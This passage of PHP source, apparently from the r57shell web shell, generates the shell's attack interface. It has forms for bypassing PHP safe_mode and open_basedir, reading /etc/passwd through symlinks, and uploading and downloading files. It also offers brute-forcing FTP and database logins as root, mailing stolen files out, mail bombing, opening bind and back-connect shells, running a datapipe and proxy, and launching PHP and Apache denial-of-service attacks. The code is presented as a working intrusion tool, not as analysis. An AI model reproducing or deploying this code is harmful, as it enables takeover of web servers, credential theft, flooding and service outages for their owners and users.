7104echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7105
7106echo $te.'</div>'.$table_end1.$fe;
7107
7108}
7109
7110
7111
7112if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7113
7114{
7115
7116echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
7117
7118echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7119
7120echo $te.'</div>'.$table_end1.$fe;
7121
7122}
7123
7124
7125
7126if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7127
7128{
7129
7130echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
7131
7132echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7133
7134echo $te.'</div>'.$table_end1.$fe;
7135
7136}
7137
7138
7139
7140if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0)
7141
7142{
7143
7144echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
7145
7146echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
7147
7148echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7149
7150echo $te.'</div>'.$table_end1.$fe;
7151
7152}
7153
7154
7155
7156if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7157
7158{
7159
7160echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
7161
7162echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
7163
7164echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7165
7166echo $te.'</div>'.$table_end1.$fe;
7167
7168}
7169
7170
7171
7172if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
7173
7174{
7175
7176echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts;
7177
7178echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18'));
7179
7180echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7181
7182echo $te.'</div>'.$table_end1.$fe;
7183
7184}
7185
7186
7187
7188if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0)
7189
7190{
7191
7192echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
7193
7194echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
7195
7196echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7197
7198echo $te.'</div>'.$table_end1.$fe;
7199
7200}
7201
7202
7203
7204if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
7205
7206{
7207
7208echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
7209
7210echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7211
7212echo $te.'</div>'.$table_end1.$fe;
7213
7214}
7215
7216
7217
7218if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
7219
7220{
7221
7222echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
7223
7224echo "<tr><td valign=top width=70%>".$ts;
7225
7226echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
7227
7228echo $te."</td><td valign=top width=30%>".$ts;
7229
7230echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
7231
7232echo $te."</td></tr>";
7233
7234echo $te.'</div>'.$table_end1;
7235
7236}
7237
7238
7239
7240if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
7241
7242{
7243
7244echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
7245
7246echo "<tr><td valign=top width=70%>".$ts;
7247
7248echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
7249
7250echo $te."</td><td valign=top width=30%>".$ts;
7251
7252echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
7253
7254echo $te."</td></tr>";
7255
7256echo $te.'</div>'.$table_end1;
7257
7258}
7259
7260
7261
7262
7263
7264if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
7265
7266echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
7267
7268echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
7269
7270echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
7271
7272echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7273
7274echo $te.'</div>'.$table_end1.$fe;
7275
7276}
7277
7278
7279
7280
7281
7282if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
7283
7284echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
7285
7286echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
7287
7288echo "<tr><td valign=top width=50%>".$ts;
7289
7290echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
7291
7292echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
7293
7294echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
7295
7296echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
7297
7298echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
7299
7300echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
7301
7302echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
7303
7304echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
7305
7306echo $te."</td><td valign=top width=50%>".$ts;
7307
7308echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
7309
7310echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
7311
7312echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
7313
7314echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
7315
7316echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
7317
7318echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
7319
7320echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
7321
7322echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7323
7324echo $te."</td></tr>";
7325
7326echo $te.'</div>'.$table_end1.$fe;
7327
7328}
7329
7330
7331
7332
7333
7334if($select_downloaders){
7335
7336 echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
7337
7338 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
7339
7340 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7341
7342 echo $te.'</div>'.$table_end1.$fe;
7343
7344}
7345
7346
7347
7348echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
7349
7350echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
7351
7352$arh = $lang[$language.'_text92'];
7353
7354if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
7355
7356if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
7357
7358if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
7359
7360echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
7361
7362echo $te.'</div>'.$table_end1.$fe;
7363
7364
7365
7366if(@function_exists("ftp_connect")){
7367
7368echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7369
7370
7371
7372echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
7373
7374echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
7375
7376echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
7377
7378echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
7379
7380echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
7381
7382echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
7383
7384echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
7385
7386echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
7387
7388
7389
7390echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7391
7392echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
7393
7394echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
7395
7396echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
7397
7398echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
7399
7400echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
7401
7402echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
7403
7404echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
7405
7406echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
7407
7408
7409
7410echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7411
7412echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
7413
7414echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
7415
7416echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
7417
7418echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
7419
7420echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
7421
7422echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
7423
7424echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
7425
7426echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
7427
7428
7429
7430echo $te."</td>".$fe."</tr></div></table>";
7431
7432}
7433
7434
7435
7436
7437
7438if(@function_exists("mail")){
7439
7440echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7441
7442echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
7443
7444echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
7445
7446echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7447
7448echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
7449
7450echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
7451
7452echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7453
7454
7455
7456echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7457
7458echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
7459
7460echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
7461
7462echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7463
7464echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
7465
7466echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
7467
7468echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
7469
7470echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7471
7472
7473
7474echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7475
7476echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
7477
7478echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
7479
7480echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7481
7482echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
7483
7484echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
7485
7486echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
7487
7488echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7489
7490
7491
7492echo $te."</td>".$fe."</tr></div></table>";
7493
7494}
7495
7496
7497
7498
7499
7500if($mysql_on||$mssql_on||$pg_on||$ora_on||$mysqli_on||$msql_on||$sqlite_on)
7501
7502{
7503
7504$select = '<select name=db>';
7505
7506if($mysql_on) $select .= '<option value=MySQL>MySQL</option>';
7507
7508if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>';
7509
7510if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>';
7511
7512if($ora_on) $select .= '<option value=Oracle>Oracle</option>';
7513
7514if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>';
7515
7516if($msql_on) $select .= '<option value=mSQL>mSQL</option>';
7517
7518if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>';
7519
7520$select .= '</select>';
7521
7522
7523
7524echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7525
7526echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
7527
7528
7529
7530echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
7531
7532echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7533
7534echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7535
7536echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
7537
7538echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
7539
7540echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
7541
7542echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
7543
7544echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
7545
7546echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
7547
7548
7549
7550echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7551
7552echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
7553
7554
7555
7556echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7557
7558echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7559
7560echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7561
7562echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
7563
7564echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
7565
7566echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
7567
7568
7569
7570echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7571
7572echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
7573
7574
7575
7576echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7577
7578echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7579
7580echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7581
7582echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7583
7584echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
7585
7586echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
7587
7588
7589
7590echo "</td>".$fe."</tr></div></table>";
7591
7592}
7593
7594
7595
7596
7597
7598if(!$safe_mode && $unix){
7599
7600echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
7601
7602echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
7603
7604echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
7605
7606echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
7607
7608echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7609
7610echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
7611
7612echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7613
7614echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
7615
7616echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
7617
7618echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
7619
7620echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7621
7622echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
7623
7624echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7625
7626echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
7627
7628echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
7629
7630echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
7631
7632echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
7633
7634echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
7635
7636echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7637
7638echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7639
7640echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
7641
7642echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
7643
7644echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
7645
7646echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7647
7648echo $te."</td>".$fe."</tr></div></table>";
7649
7650}
7651
7652
7653
7654echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts;
7655
7656echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7657
7658echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
7659
7660echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe);
7661
7662echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe);
7663
7664echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe);
7665
7666echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe);
7667
7668echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe);
7669
7670echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe);
7671
7672echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
7673
7674echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe);
7675
